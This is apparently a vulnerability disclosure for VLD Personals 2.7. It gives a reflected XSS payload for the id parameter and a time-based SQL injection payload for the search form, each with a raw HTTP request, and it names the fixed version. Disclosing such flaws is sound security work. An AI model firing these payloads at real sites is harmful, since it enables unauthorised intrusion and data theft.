# Exploit Title: VLD Personal – Multiple Vulnerabilities# Date: 09/11/2014# Exploit Author: Mr T# Exploit Authors Website: http://www.securitypentester.ninja# Vendor Homepage: http://www.vldpersonals.com/# Software Link: http://www.vldpersonals.com/clients/downloads.php# Vulnerable Version: 2.7# Fixed Version 2.7.1# Tested on: Windows / Linux
XSS Attack
Issue detail:
The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9811c”><script>alert(1)</script>b7ec317c816 was submitted in the id parameter.
Response :
GET /index.php?m=member_profile&p=profile&id=9811c”><script>alert(1)<%2fscript>b7ec317c816 HTTP/1.1
SQL Injection:
Issue detail:
The country/gender1/gender2 parameter appears to be vulnerable to SQL injection attacks. The payload and benchmark(20000000,sha1(1))– was submitted in the country parameter.
Response:
POST /index.php?m=search HTTP/1.1
Host: localhost
Accept:*/*
Accept-Language: en
User-Agent: Mozilla/5.0(compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length:92
Cookie: visitors=x466x3878x3725x3797; PHPSESSID=nu75qtji88q4bilghhtg2s2; sessdata=0>age_from=19&age_to=19&issearch=1&submit=Search&gender1=2>&gender2=2&type_id=members
>&country=>1%20and%20benchmark(20000000%2csha1(1))–%20--
Talib Osmani
